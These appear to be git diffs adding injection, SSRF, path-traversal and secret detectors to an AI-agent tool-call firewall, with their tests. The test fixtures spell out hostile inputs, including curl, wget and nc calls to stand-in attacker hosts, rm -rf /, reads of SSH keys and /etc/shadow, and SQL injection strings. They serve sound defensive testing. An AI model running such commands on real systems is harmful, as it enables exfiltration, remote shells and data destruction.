+    for key, value in arguments.items():
+        path = f"{prefix}.{key}" if prefix else key
+        if isinstance(value, str):
+            results.append((path, value))
+        elif isinstance(value, dict):
+            results.extend(_extract_strings(value, path))
+        elif isinstance(value, list):
+            for i, item in enumerate(value):
+                item_path = f"{path}[{i}]"
+                if isinstance(item, str):
+                    results.append((item_path, item))
+                elif isinstance(item, dict):
+                    results.extend(_extract_strings(item, item_path))
+    return results
+
+
+def _extract_host_from_url(value: str) -> str | None:
+    """Extract hostname from a URL string, stripping IPv6 brackets.
+
+    Returns None if the string is not a URL or has no hostname.
+    """
+    parsed = urllib.parse.urlparse(value)
+    if not parsed.scheme or not parsed.hostname:
+        return None
+    return parsed.hostname
+
+
+def _is_dangerous_ip(host: str) -> bool:
+    """Check if a host string is a private/loopback/link-local/reserved IP.
+
+    Returns False if the string is not a valid IP address (e.g., a hostname).
+    """
+    try:
+        ip = ipaddress.ip_address(host)
+    except ValueError:
+        return False
+
+    # Explicit checks for Python 3.10 compat (is_private behavior varies)
+    if ip == ipaddress.ip_address("0.0.0.0") or ip == ipaddress.ip_address("::"):
+        return True
+
+    return ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved
+
+
+def detect(tool_call: ToolCall) -> DetectorResult:
+    """Scan all string parameter values for SSRF-dangerous IP addresses.
+
+    Returns DetectorResult with matched=True on first private/loopback/
+    link-local/metadata IP found in any URL or bare IP string.
+    """
+    strings = _extract_strings(tool_call.arguments)
+
+    for param_path, value in strings:
+        # 1. Try URL parse first
+        host = _extract_host_from_url(value)
+        if host and _is_dangerous_ip(host):
+            return DetectorResult(
+                matched=True,
+                detector_name="ssrf_private_ip",
+                detail=f"SSRF detected in param '{param_path}': private/internal IP {host}",
+            )
+
+        # 2. Bare IP fallback
+        stripped = value.strip()
+        if _BARE_IPV4_RE.match(stripped) or _BARE_IPV6_RE.match(stripped):
+            # Strip brackets for IPv6
+            bare = stripped.strip("[]")
+            if _is_dangerous_ip(bare):
+                return DetectorResult(
+                    matched=True,
+                    detector_name="ssrf_private_ip",
+                    detail=f"SSRF detected in param '{param_path}': private/internal IP {bare}",
+                )
+
+    return DetectorResult(matched=False, detector_name="ssrf_private_ip")

--- a/src/agentgate/detectors/ssrf.py
+++ b/src/agentgate/detectors/ssrf.py
@@ -5,32 +5,13 @@ from __future__ import annotations
 import ipaddress
 import re
 import urllib.parse
-from typing import Any
 
+from agentgate.detectors._util import extract_strings
 from agentgate.models import DetectorResult, ToolCall
 
 # Conservative bare-IP regexes (avoid false positives on non-IP strings)
 _BARE_IPV4_RE = re.compile(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$")
 _BARE_IPV6_RE = re.compile(r"^\[?[0-9a-fA-F:]+\]?$")
-
-
-def _extract_strings(arguments: dict[str, Any], prefix: str = "") -> list[tuple[str, str]]:
-    """Recursively extract all (key_path, string_value) pairs from arguments."""
-    results: list[tuple[str, str]] = []
-    for key, value in arguments.items():
-        path = f"{prefix}.{key}" if prefix else key
-        if isinstance(value, str):
-            results.append((path, value))
-        elif isinstance(value, dict):
-            results.extend(_extract_strings(value, path))
-        elif isinstance(value, list):
-            for i, item in enumerate(value):
-                item_path = f"{path}[{i}]"
-                if isinstance(item, str):
-                    results.append((item_path, item))
-                elif isinstance(item, dict):
-                    results.extend(_extract_strings(item, item_path))
-    return results
 
 
 def _extract_host_from_url(value: str) -> str | None:
@@ -67,7 +48,7 @@ def detect(tool_call: ToolCall) -> DetectorResult:
     Returns DetectorResult with matched=True on first private/loopback/
     link-local/metadata IP found in any URL or bare IP string.
     """
-    strings = _extract_strings(tool_call.arguments)
+    strings = extract_strings(tool_call.arguments)
 
     for param_path, value in strings:
         # 1. Try URL parse first

--- a/src/agentgate/engine.py
+++ b/src/agentgate/engine.py
@@ -2,6 +2,7 @@
 
 from __future__ import annotations
 
+from agentgate.detectors import run_all as run_detectors
 from agentgate.models import Decision, ToolAllowRule, ToolBlockRule, ToolCall
 from agentgate.policy import CompiledPolicy
 
@@ -19,8 +20,15 @@ def evaluate(tool_call: ToolCall, policy: CompiledPolicy) -> Decision:
     """
     rules = policy.config.policies
 
-    # --- Step 1: Detectors (Issue #26) ---
-    # Will short-circuit here if any detector fires
+    # --- Step 1: Detectors ---
+    detector_results = run_detectors(tool_call, policy.config.detectors.model_dump())
+    if detector_results:
+        first = detector_results[0]
+        return Decision(
+            action="block",
+            matched_detector=first.detector_name,
+            message=first.detail,
+        )
 
     # --- Step 2: tool_block ---
     block_rules = [r for r in rules if isinstance(r, ToolBlockRule)]

--- a/tests/test_detectors/test_command_injection.py
+++ b/tests/test_detectors/test_command_injection.py
@@ -1,3 +1,129 @@
 """Tests for command injection detector."""
 
-# TODO: 5+ positive and 5+ negative test cases
+from agentgate.detectors.command_injection import detect
+from agentgate.models import ToolCall
+
+
+def _call(arguments: dict) -> ToolCall:
+    """Build a ToolCall with the given arguments."""
+    return ToolCall(tool_name="execute", arguments=arguments, call_id=1)
+
+
+# ── Positive cases (8) — must detect ────────────────────────────────────
+
+
+def test_semicolon_rm():
+    result = detect(_call({"cmd": "file.txt; rm -rf /"}))
+    assert result.matched is True
+    assert result.detector_name == "command_injection"
+    assert "shell command after semicolon" in result.detail
+
+
+def test_and_curl():
+    result = detect(_call({"url": "x && curl evil.com/exfil"}))
+    assert result.matched is True
+    assert result.detector_name == "command_injection"
+    assert "shell command after &&" in result.detail
+
+
+def test_or_wget():
+    result = detect(_call({"arg": "|| wget evil.com/shell.sh"}))
+    assert result.matched is True
+    assert result.detector_name == "command_injection"
+    assert "shell command after ||" in result.detail
+
+
+def test_pipe_nc():
+    result = detect(_call({"input": "file.txt | nc attacker.com 4444"}))
+    assert result.matched is True
+    assert result.detector_name == "command_injection"
+    assert "pipe to shell command" in result.detail
+
+
+def test_redirect_to_cron():
+    result = detect(_call({"data": "payload > /etc/cron.d/backdoor"}))
+    assert result.matched is True
+    assert result.detector_name == "command_injection"
+    assert "output redirection to file" in result.detail
+
+
+def test_backtick_whoami():
+    result = detect(_call({"msg": "user is `whoami`"}))
+    assert result.matched is True
+    assert result.detector_name == "command_injection"
+    assert "backtick command substitution" in result.detail
+
+
+def test_dollar_paren_cat():
+    result = detect(_call({"text": "$(cat /etc/passwd)"}))
+    assert result.matched is True
+    assert result.detector_name == "command_injection"
+    assert "$() command substitution" in result.detail
+
+
+def test_embedded_newline():
+    result = detect(_call({"cmd": "ls\nrm -rf /"}))
+    assert result.matched is True
+    assert result.detector_name == "command_injection"
+    assert "embedded newline" in result.detail
+
+
+# ── Negative cases (7) — must NOT detect ────────────────────────────────
+
+
+def test_ampersand_in_company_name():
+    result = detect(_call({"query": "AT&T quarterly earnings"}))
+    assert result.matched is False
+    assert result.detector_name == "command_injection"
+
+
+def test_semicolon_in_text():
+    result = detect(_call({"content": "Hello world; great to meet you"}))
+    assert result.matched is False
+    assert result.detector_name == "command_injection"
+
+
+def test_pipe_in_data_separator():
+    result = detect(_call({"format": "csv|tsv|json"}))
+    assert result.matched is False
+    assert result.detector_name == "command_injection"
+
+
+def test_gt_in_comparison():
+    result = detect(_call({"filter": "price > 100"}))
+    assert result.matched is False
+    assert result.detector_name == "command_injection"
+
+
+def test_url_with_ampersands():
+    result = detect(_call({"url": "https://api.com?a=1&b=2&c=3"}))
+    assert result.matched is False
+    assert result.detector_name == "command_injection"
+
+
+def test_normal_filename():
+    result = detect(_call({"path": "report_2026-Q1.csv"}))
+    assert result.matched is False
+    assert result.detector_name == "command_injection"
+
+
+def test_email_with_pipe_in_body():
+    result = detect(_call({"body": "Use A | B notation for alternatives"}))
+    assert result.matched is False
+    assert result.detector_name == "command_injection"
+
+
+# ── Edge cases (2) ──────────────────────────────────────────────────────
+
+
+def test_nested_args():
+    result = detect(_call({"config": {"script": "x; curl evil.com"}}))
+    assert result.matched is True
+    assert result.detector_name == "command_injection"
+    assert "config.script" in result.detail
+
+
+def test_empty_args():
+    result = detect(_call({}))
+    assert result.matched is False
+    assert result.detector_name == "command_injection"

--- a/tests/test_detectors/test_path_traversal.py
+++ b/tests/test_detectors/test_path_traversal.py
@@ -1,3 +1,130 @@
 """Tests for path traversal detector."""
 
-# TODO: 5+ positive and 5+ negative test cases
+from agentgate.detectors.path_traversal import detect
+from agentgate.models import ToolCall
+
+
+def _call(arguments: dict) -> ToolCall:
+    """Build a ToolCall with the given arguments."""
+    return ToolCall(tool_name="read_file", arguments=arguments, call_id=1)
+
+
+# ── Positive cases (8) — must detect ────────────────────────────────────
+
+
+def test_relative_traversal_etc_passwd():
+    result = detect(_call({"path": "../../etc/passwd"}))
+    assert result.matched is True
+    assert result.detector_name == "path_traversal"
+    assert "traversal" in result.detail.lower()
+
+
+def test_absolute_etc_shadow():
+    result = detect(_call({"path": "/etc/shadow"}))
+    assert result.matched is True
+    assert result.detector_name == "path_traversal"
+    assert "/etc/" in result.detail
+
+
+def test_tilde_ssh_key():
+    result = detect(_call({"path": "~/.ssh/id_rsa"}))
+    assert result.matched is True
+    assert result.detector_name == "path_traversal"
+    assert "~/.ssh" in result.detail
+
+
+def test_traversal_from_allowed_dir():
+    result = detect(_call({"path": "/data/workspace/../../../etc/passwd"}))
+    assert result.matched is True
+    assert result.detector_name == "path_traversal"
+    assert "traversal" in result.detail.lower()
+
+
+def test_proc_self_environ():
+    result = detect(_call({"path": "/proc/self/environ"}))
+    assert result.matched is True
+    assert result.detector_name == "path_traversal"
+    assert "/proc/" in result.detail
+
+
+def test_url_encoded_traversal():
+    result = detect(_call({"path": "%2e%2e%2f%2e%2e%2fetc/passwd"}))
+    assert result.matched is True
+    assert result.detector_name == "path_traversal"
+    assert "traversal" in result.detail.lower()
+
+
+def test_null_byte_injection():
+    result = detect(_call({"path": "/data/workspace/safe%00../../etc/passwd"}))
+    assert result.matched is True
+    assert result.detector_name == "path_traversal"
+    assert "null byte" in result.detail.lower() or "traversal" in result.detail.lower()
+
+
+def test_home_user_ssh():
+    result = detect(_call({"path": "/home/ubuntu/.ssh/authorized_keys"}))
+    assert result.matched is True
+    assert result.detector_name == "path_traversal"
+    assert "home" in result.detail.lower()
+
+
+# ── Negative cases (7) — must NOT detect ────────────────────────────────
+
+
+def test_safe_absolute_path():
+    result = detect(_call({"path": "/data/workspace/reports/q4.csv"}))
+    assert result.matched is False
+    assert result.detector_name == "path_traversal"
+
+
+def test_safe_relative_path():
+    result = detect(_call({"path": "./local_file.txt"}))
+    assert result.matched is False
+    assert result.detector_name == "path_traversal"
+
+
+def test_slash_in_non_traversal_context():
+    result = detect(_call({"body": "profits grew quarter/quarter"}))
+    assert result.matched is False
+    assert result.detector_name == "path_traversal"
+
+
+def test_safe_nested_dir():
+    result = detect(_call({"path": "/data/workspace/etc/report.csv"}))
+    assert result.matched is False
+    assert result.detector_name == "path_traversal"
+
+
+def test_no_string_params():
+    result = detect(_call({"recursive": True, "depth": 3}))
+    assert result.matched is False
+    assert result.detector_name == "path_traversal"
+
+
+def test_empty_arguments():
+    result = detect(_call({}))
+    assert result.matched is False
+    assert result.detector_name == "path_traversal"
+
+
+def test_safe_absolute_path_deep():
+    result = detect(_call({"path": "/data/workspace/subdir/another/file.md"}))
+    assert result.matched is False
+    assert result.detector_name == "path_traversal"
+
+
+# ── Edge cases (2) ──────────────────────────────────────────────────────
+
+
+def test_nested_arg_traversal():
+    result = detect(_call({"options": {"backup_path": "../../tmp/backup"}}))
+    assert result.matched is True
+    assert result.detector_name == "path_traversal"
+    assert "options.backup_path" in result.detail
+
+
+def test_windows_backslash_traversal():
+    result = detect(_call({"path": "..\\..\\windows\\system32\\config\\sam"}))
+    assert result.matched is True
+    assert result.detector_name == "path_traversal"
+    assert "traversal" in result.detail.lower()

--- a/tests/test_detectors/test_registry.py
+++ b/tests/test_detectors/test_registry.py
@@ -1,0 +1,95 @@
+"""Unit tests for the detector registry run_all() pipeline."""
+
+from __future__ import annotations
+
+from agentgate.detectors import run_all
+from agentgate.models import ToolCall
+
+ALL_ENABLED = {
+    "sql_injection": True,
+    "path_traversal": True,
+    "command_injection": True,
+    "ssrf_private_ip": True,
+    "secrets_in_params": True,
+}
+
+
+def _call(arguments: dict) -> ToolCall:
+    return ToolCall(tool_name="test_tool", arguments=arguments)
+
+
+# --- Test 1: Clean call, no detectors fire ---
+
+
+def test_run_all_clean_call_returns_empty():
+    results = run_all(_call({"text": "hello world"}), ALL_ENABLED)
+    assert results == []
+
+
+# --- Test 2: Path traversal fires ---
+
+
+def test_run_all_path_traversal():
+    results = run_all(_call({"path": "../../etc/passwd"}), ALL_ENABLED)
+    assert len(results) >= 1
+    names = [r.detector_name for r in results]
+    assert "path_traversal" in names
+
+
+# --- Test 3: Multiple detectors fire (path traversal + secrets) ---
+
+
+def test_run_all_multiple_detectors():
+    results = run_all(
+        _call({"path": "../../etc/passwd", "key": "AKIA1234567890ABCDEF"}),
+        ALL_ENABLED,
+    )
+    names = [r.detector_name for r in results]
+    assert "path_traversal" in names
+    assert "secrets_in_params" in names
+    assert len(names) >= 2
+
+
+# --- Test 4: Disabled detector is skipped ---
+
+
+def test_run_all_disabled_detector_skipped():
+    enabled = {**ALL_ENABLED, "path_traversal": False}
+    results = run_all(_call({"path": "../../etc/passwd"}), enabled)
+    names = [r.detector_name for r in results]
+    assert "path_traversal" not in names
+
+
+# --- Test 5: SQL injection fires ---
+
+
+def test_run_all_sql_injection():
+    results = run_all(_call({"query": "DROP TABLE users"}), ALL_ENABLED)
+    names = [r.detector_name for r in results]
+    assert "sql_injection" in names
+
+
+# --- Test 6: SSRF fires ---
+
+
+def test_run_all_ssrf():
+    results = run_all(_call({"url": "http://169.254.169.254/"}), ALL_ENABLED)
+    names = [r.detector_name for r in results]
+    assert "ssrf_private_ip" in names
+
+
+# --- Test 7: Command injection fires ---
+
+
+def test_run_all_command_injection():
+    results = run_all(_call({"cmd": "file.txt; rm -rf /"}), ALL_ENABLED)
+    names = [r.detector_name for r in results]
+    assert "command_injection" in names
+
+
+# --- Test 8: Empty enabled dict, all skipped ---
+
+
+def test_run_all_empty_enabled_skips_all():
+    results = run_all(_call({"path": "../../etc/passwd"}), {})
+    assert results == []

--- a/tests/test_detectors/test_secrets.py
+++ b/tests/test_detectors/test_secrets.py
@@ -1,3 +1,125 @@
-"""Tests for secrets detector."""
+"""Tests for the secrets_in_params detector."""
 
-# TODO: 5+ positive and 5+ negative test cases (AWS, GitHub, RSA key patterns)
+from __future__ import annotations
+
+from agentgate.detectors.secrets import detect
+from agentgate.models import ToolCall
+
+
+def _call(arguments: dict) -> ToolCall:
+    return ToolCall(tool_name="test_tool", arguments=arguments, call_id="test-1")
+
+
+# ---------------------------------------------------------------------------
+# Positive cases (8 tests — must all match)
+# ---------------------------------------------------------------------------
+
+
+def test_aws_access_key_id():
+    result = detect(_call({"body": "key is AKIA1234567890ABCDEF"}))
+    assert result.matched
+    assert result.detector_name == "secrets_in_params"
+    assert "AWS access key ID" in result.detail
+
+
+def test_github_pat_classic():
+    result = detect(_call({"token": "ghp_aBcDeFgHiJkLmNoPqRsTuVwXyZ0123456789"}))
+    assert result.matched
+    assert "GitHub token" in result.detail
+
+
+def test_github_fine_grained_pat():
+    pat = f"github_pat_{'A' * 22}_{'B' * 59}"
+    result = detect(_call({"auth": pat}))
+    assert result.matched
+    assert "GitHub fine-grained PAT" in result.detail
+
+
+def test_rsa_private_key():
+    result = detect(_call({"data": "-----BEGIN RSA PRIVATE KEY-----\nMIIE..."}))
+    assert result.matched
+    assert "PEM private key" in result.detail
+
+
+def test_generic_private_key():
+    result = detect(_call({"data": "-----BEGIN PRIVATE KEY-----\nMIIE..."}))
+    assert result.matched
+    assert "PEM private key" in result.detail
+
+
+def test_password_assignment():
+    result = detect(_call({"config": "database_password=hunter2"}))
+    assert result.matched
+    assert "password/secret assignment" in result.detail
+
+
+def test_secret_in_nested_param():
+    result = detect(_call({"outer": {"inner": "api_key=sk_12345"}}))
+    assert result.matched
+    assert result.detector_name == "secrets_in_params"
+
+
+def test_slack_token():
+    result = detect(_call({"webhook": "xoxb-1234-5678-abcdefghij"}))
+    assert result.matched
+    assert "Slack token" in result.detail
+
+
+# ---------------------------------------------------------------------------
+# Negative cases (7 tests — must all NOT match)
+# ---------------------------------------------------------------------------
+
+
+def test_normal_business_text():
+    result = detect(_call({"body": "Please review the Q4 sales report"}))
+    assert not result.matched
+    assert result.detector_name == "secrets_in_params"
+
+
+def test_word_password_in_prose():
+    result = detect(_call({"body": "Please reset your password at the portal"}))
+    assert not result.matched
+
+
+def test_short_alphanumeric():
+    result = detect(_call({"token": "abc123"}))
+    assert not result.matched
+
+
+def test_wrong_aws_prefix():
+    result = detect(_call({"key": "AKID1234567890ABCDEF"}))
+    assert not result.matched
+
+
+def test_uuid_not_flagged():
+    result = detect(_call({"id": "550e8400-e29b-41d4-a716-446655440000"}))
+    assert not result.matched
+
+
+def test_file_path_with_key():
+    result = detect(_call({"path": "/data/workspace/key-metrics.csv"}))
+    assert not result.matched
+
+
+def test_base64_without_prefix():
+    result = detect(_call({"data": "aGVsbG8gd29ybGQgdGhpcyBpcyBhIHRlc3Q="}))
+    assert not result.matched
+
+
+# ---------------------------------------------------------------------------
+# Edge cases (2 tests)
+# ---------------------------------------------------------------------------
+
+
+def test_aws_key_in_url():
+    result = detect(
+        _call({"url": "https://s3.amazonaws.com/?AWSAccessKeyId=AKIA1234567890ABCDEF"})
+    )
+    assert result.matched
+    assert "AWS access key ID" in result.detail
+
+
+def test_empty_arguments():
+    result = detect(_call({}))
+    assert not result.matched
+    assert result.detector_name == "secrets_in_params"

--- a/tests/test_detectors/test_secrets.py
+++ b/tests/test_detectors/test_secrets.py
@@ -121,3 +121,16 @@ def test_empty_arguments():
     result = detect(_call({}))
     assert not result.matched
     assert result.detector_name == "secrets_in_params"
+
+
+def test_stripe_secret_key():
+    # Use sk_test_ prefix (not sk_live_) to avoid GitHub push protection false positive
+    result = detect(_call({"key": "sk_test_" + "a" * 24}))
+    assert result.matched
+    assert "Stripe API key" in result.detail
+
+
+def test_bearer_token():
+    result = detect(_call({"header": "Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.payload.sig"}))
+    assert result.matched
+    assert "Bearer authorization token" in result.detail

--- a/tests/test_detectors/test_secrets.py
+++ b/tests/test_detectors/test_secrets.py
@@ -112,9 +112,7 @@ def test_base64_without_prefix():
 
 
 def test_aws_key_in_url():
-    result = detect(
-        _call({"url": "https://s3.amazonaws.com/?AWSAccessKeyId=AKIA1234567890ABCDEF"})
-    )
+    result = detect(_call({"url": "https://s3.amazonaws.com/?AWSAccessKeyId=AKIA1234567890ABCDEF"}))
     assert result.matched
     assert "AWS access key ID" in result.detail
 

--- a/tests/test_detectors/test_sql_injection.py
+++ b/tests/test_detectors/test_sql_injection.py
@@ -121,3 +121,29 @@ def test_list_param_scanning():
     assert result.matched is True
     assert result.detector_name == "sql_injection"
     assert "queries[1]" in result.detail
+
+
+def test_exec_call():
+    result = detect(_call({"query": "EXEC(sp_send_dbmail @recipients='attacker@evil.com')"}))
+    assert result.matched is True
+    assert result.detector_name == "sql_injection"
+    assert "EXEC" in result.detail
+
+
+def test_nested_list_bypass():
+    """Strings inside list[list[...]] must be scanned (not bypassed)."""
+    result = detect(_call({"data": [["DROP TABLE users"]]}))
+    assert result.matched is True
+    assert result.detector_name == "sql_injection"
+    assert "data[0][0]" in result.detail
+
+
+def test_insert_into_english_prose_is_accepted_fp():
+    """'insert into' in English prose matches INSERT INTO — accepted false positive.
+
+    The regex requires the two-word SQL structural context (INSERT followed by INTO).
+    Natural English rarely produces this exact bigram, but when it does, we accept
+    the FP. Narrowing to require parentheses after the table name is a v1 option.
+    """
+    result = detect(_call({"text": "Please insert into the record your full name"}))
+    assert result.matched is True  # accepted FP — documented

--- a/tests/test_detectors/test_sql_injection.py
+++ b/tests/test_detectors/test_sql_injection.py
@@ -1,3 +1,123 @@
 """Tests for SQL injection detector."""
 
-# TODO: 5+ positive and 5+ negative test cases
+from agentgate.detectors.sql_injection import detect
+from agentgate.models import ToolCall
+
+
+def _call(arguments: dict) -> ToolCall:
+    """Build a ToolCall with the given arguments."""
+    return ToolCall(tool_name="query_db", arguments=arguments, call_id=1)
+
+
+# ── Positive cases (7) — must detect ────────────────────────────────────
+
+
+def test_drop_table():
+    result = detect(_call({"query": "DROP TABLE users"}))
+    assert result.matched is True
+    assert result.detector_name == "sql_injection"
+    assert "DROP statement" in result.detail
+
+
+def test_delete_from():
+    result = detect(_call({"query": "'; DELETE FROM accounts; --"}))
+    assert result.matched is True
+    assert result.detector_name == "sql_injection"
+    assert "DELETE FROM" in result.detail or "stacked" in result.detail
+
+
+def test_union_select():
+    result = detect(_call({"query": "' UNION SELECT password FROM users --"}))
+    assert result.matched is True
+    assert result.detector_name == "sql_injection"
+    assert "UNION SELECT" in result.detail
+
+
+def test_or_tautology():
+    result = detect(_call({"query": "' OR 1=1 --"}))
+    assert result.matched is True
+    assert result.detector_name == "sql_injection"
+    assert "OR tautology" in result.detail
+
+
+def test_update_set():
+    result = detect(_call({"query": "UPDATE users SET role='admin' WHERE id=1"}))
+    assert result.matched is True
+    assert result.detector_name == "sql_injection"
+    assert "UPDATE...SET" in result.detail
+
+
+def test_truncate_table():
+    result = detect(_call({"query": "TRUNCATE TABLE sessions"}))
+    assert result.matched is True
+    assert result.detector_name == "sql_injection"
+    assert "TRUNCATE" in result.detail
+
+
+def test_nested_param_injection():
+    result = detect(_call({"config": {"sql": "DROP TABLE logs"}}))
+    assert result.matched is True
+    assert result.detector_name == "sql_injection"
+    assert "config.sql" in result.detail
+    assert "DROP statement" in result.detail
+
+
+# ── Negative cases (7) — must NOT detect ────────────────────────────────
+
+
+def test_benign_select():
+    result = detect(_call({"query": "SELECT * FROM sales WHERE quarter = 'Q4'"}))
+    assert result.matched is False
+    assert result.detector_name == "sql_injection"
+
+
+def test_english_prose_select():
+    result = detect(_call({"text": "The SELECT committee met on Tuesday"}))
+    assert result.matched is False
+    assert result.detector_name == "sql_injection"
+
+
+def test_english_prose_drop():
+    result = detect(_call({"text": "Please drop the meeting notes in the shared folder"}))
+    assert result.matched is False
+    assert result.detector_name == "sql_injection"
+
+
+def test_normal_string_params():
+    result = detect(_call({"name": "John", "email": "john@example.com"}))
+    assert result.matched is False
+    assert result.detector_name == "sql_injection"
+
+
+def test_empty_arguments():
+    result = detect(_call({}))
+    assert result.matched is False
+    assert result.detector_name == "sql_injection"
+
+
+def test_numeric_params_ignored():
+    result = detect(_call({"count": 42, "active": True, "path": "/data/file.txt"}))
+    assert result.matched is False
+    assert result.detector_name == "sql_injection"
+
+
+def test_benign_insert_english():
+    result = detect(_call({"text": "Insert the new section after paragraph 3"}))
+    assert result.matched is False
+    assert result.detector_name == "sql_injection"
+
+
+# ── Edge cases (2) ──────────────────────────────────────────────────────
+
+
+def test_case_insensitive():
+    result = detect(_call({"query": "dRoP tAbLe users"}))
+    assert result.matched is True
+    assert result.detector_name == "sql_injection"
+
+
+def test_list_param_scanning():
+    result = detect(_call({"queries": ["SELECT 1", "DROP TABLE x"]}))
+    assert result.matched is True
+    assert result.detector_name == "sql_injection"
+    assert "queries[1]" in result.detail

--- a/tests/test_detectors/test_ssrf.py
+++ b/tests/test_detectors/test_ssrf.py
@@ -1,3 +1,131 @@
-"""Tests for SSRF detector."""
+"""Tests for SSRF private IP detector."""
 
-# TODO: 5+ positive and 5+ negative test cases
+from agentgate.detectors.ssrf import detect
+from agentgate.models import ToolCall
+
+
+def _call(arguments: dict) -> ToolCall:
+    """Build a ToolCall with the given arguments."""
+    return ToolCall(tool_name="fetch_url", arguments=arguments, call_id=1)
+
+
+# ── Positive cases (8) — must detect ────────────────────────────────────
+
+
+def test_aws_metadata_endpoint():
+    result = detect(
+        _call({"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"})
+    )
+    assert result.matched is True
+    assert result.detector_name == "ssrf_private_ip"
+    assert "169.254.169.254" in result.detail
+
+
+def test_private_10_network():
+    result = detect(_call({"url": "http://10.0.0.1/admin"}))
+    assert result.matched is True
+    assert result.detector_name == "ssrf_private_ip"
+    assert "10.0.0.1" in result.detail
+
+
+def test_private_172_network():
+    result = detect(_call({"url": "http://172.16.0.1/internal"}))
+    assert result.matched is True
+    assert result.detector_name == "ssrf_private_ip"
+    assert "172.16.0.1" in result.detail
+
+
+def test_private_192_network():
+    result = detect(_call({"url": "http://192.168.1.1/config"}))
+    assert result.matched is True
+    assert result.detector_name == "ssrf_private_ip"
+    assert "192.168.1.1" in result.detail
+
+
+def test_loopback_127():
+    result = detect(_call({"url": "http://127.0.0.1:8080/"}))
+    assert result.matched is True
+    assert result.detector_name == "ssrf_private_ip"
+    assert "127.0.0.1" in result.detail
+
+
+def test_zero_address():
+    result = detect(_call({"url": "http://0.0.0.0/"}))
+    assert result.matched is True
+    assert result.detector_name == "ssrf_private_ip"
+    assert "0.0.0.0" in result.detail
+
+
+def test_ipv6_loopback():
+    result = detect(_call({"url": "http://[::1]:3000/"}))
+    assert result.matched is True
+    assert result.detector_name == "ssrf_private_ip"
+    assert "::1" in result.detail
+
+
+def test_bare_private_ip():
+    result = detect(_call({"target": "192.168.1.1"}))
+    assert result.matched is True
+    assert result.detector_name == "ssrf_private_ip"
+    assert "192.168.1.1" in result.detail
+
+
+# ── Negative cases (7) — must NOT detect ────────────────────────────────
+
+
+def test_public_api_url():
+    result = detect(_call({"url": "https://api.github.com/repos"}))
+    assert result.matched is False
+    assert result.detector_name == "ssrf_private_ip"
+
+
+def test_public_dns_ip():
+    result = detect(_call({"url": "https://8.8.8.8/dns-query"}))
+    assert result.matched is False
+    assert result.detector_name == "ssrf_private_ip"
+
+
+def test_public_website():
+    result = detect(_call({"url": "https://www.example.com/page"}))
+    assert result.matched is False
+    assert result.detector_name == "ssrf_private_ip"
+
+
+def test_non_url_string():
+    result = detect(_call({"path": "/data/workspace/report.csv"}))
+    assert result.matched is False
+    assert result.detector_name == "ssrf_private_ip"
+
+
+def test_numeric_string_not_ip():
+    result = detect(_call({"limit": "192"}))
+    assert result.matched is False
+    assert result.detector_name == "ssrf_private_ip"
+
+
+def test_public_ip_bare():
+    result = detect(_call({"host": "151.101.1.69"}))
+    assert result.matched is False
+    assert result.detector_name == "ssrf_private_ip"
+
+
+def test_empty_arguments():
+    result = detect(_call({}))
+    assert result.matched is False
+    assert result.detector_name == "ssrf_private_ip"
+
+
+# ── Edge cases (2) ──────────────────────────────────────────────────────
+
+
+def test_nested_url_param():
+    result = detect(_call({"options": {"endpoint": "http://10.0.0.1/api"}}))
+    assert result.matched is True
+    assert result.detector_name == "ssrf_private_ip"
+    assert "options.endpoint" in result.detail
+
+
+def test_url_with_path_only():
+    result = detect(_call({"url": "/api/v1/users"}))
+    assert result.matched is False
+    assert result.detector_name == "ssrf_private_ip"

--- a/tests/test_engine.py
+++ b/tests/test_engine.py
@@ -153,3 +153,56 @@ def test_no_allowlist_means_all_tools_pass_to_default():
     )
     decision = evaluate(_call("anything_else"), policy)
     assert decision.action == "allow"
+
+
+# --- Detector integration tests (Issue #26) ---
+
+
+def _call_with_args(tool_name: str = "read_file", arguments: dict | None = None) -> ToolCall:
+    return ToolCall(tool_name=tool_name, arguments=arguments or {})
+
+
+def test_detector_blocks_even_when_tool_on_allowlist():
+    """Detectors (Step 1) take precedence over tool_allow (Step 3)."""
+    policy = _make_policy(
+        policies=[
+            ToolAllowRule(name="safe-tools", type="tool_allow", tools=["read_file"]),
+        ],
+    )
+    tc = _call_with_args("read_file", {"path": "../../etc/passwd"})
+    decision = evaluate(tc, policy)
+    assert decision.action == "block"
+    assert decision.matched_detector is not None
+    assert decision.matched_rule is None
+
+
+def test_detector_blocks_with_default_allow_no_rules():
+    """Detectors fire before the default decision, even with no policy rules."""
+    policy = _make_policy(default_decision="allow")
+    tc = _call_with_args("any_tool", {"key": "AKIA1234567890ABCDEF"})
+    decision = evaluate(tc, policy)
+    assert decision.action == "block"
+    assert decision.matched_detector == "secrets_in_params"
+
+
+def test_detector_block_returns_matched_detector_not_matched_rule():
+    """A detector block populates matched_detector, not matched_rule."""
+    policy = _make_policy(default_decision="allow")
+    tc = _call_with_args("tool", {"query": "DROP TABLE users"})
+    decision = evaluate(tc, policy)
+    assert decision.action == "block"
+    assert decision.matched_detector == "sql_injection"
+    assert decision.matched_rule is None
+    assert decision.message is not None
+
+
+def test_clean_call_passes_detectors_and_allowlist():
+    """A clean tool call passes both detectors and allowlist."""
+    policy = _make_policy(
+        policies=[
+            ToolAllowRule(name="safe-tools", type="tool_allow", tools=["read_file"]),
+        ],
+    )
+    tc = _call_with_args("read_file", {"text": "hello world"})
+    decision = evaluate(tc, policy)
+    assert decision.action == "allow"

--- a/tests/test_integration.py
+++ b/tests/test_integration.py
@@ -159,9 +159,7 @@ class TestGoldenPathPolicy:
         policy = load_and_compile(EXAMPLE_POLICY_PATH)
 
         # read_file is on allowlist → allow
-        decision_allow = evaluate(
-            ToolCall(tool_name="read_file", arguments={}, call_id=1), policy
-        )
+        decision_allow = evaluate(ToolCall(tool_name="read_file", arguments={}, call_id=1), policy)
         assert decision_allow.action == "allow"
 
         # delete_file is on blocklist → block

--- a/tests/test_proxy_policy.py
+++ b/tests/test_proxy_policy.py
@@ -198,3 +198,34 @@ class TestMixedDecisions:
         r3 = read_message(proc)
         assert r3["id"] == 12
         assert "result" in r3
+
+
+# ---------------------------------------------------------------------------
+# Detector integration (Issue #26)
+# ---------------------------------------------------------------------------
+
+ALLOW_READ_FILE = """\
+version: "0.1"
+policies:
+  - name: allow-read
+    type: tool_allow
+    tools:
+      - read_file
+"""
+
+
+class TestDetectorBlocksViaProxy:
+    """Test 9: Detectors block tool calls end-to-end through the proxy."""
+
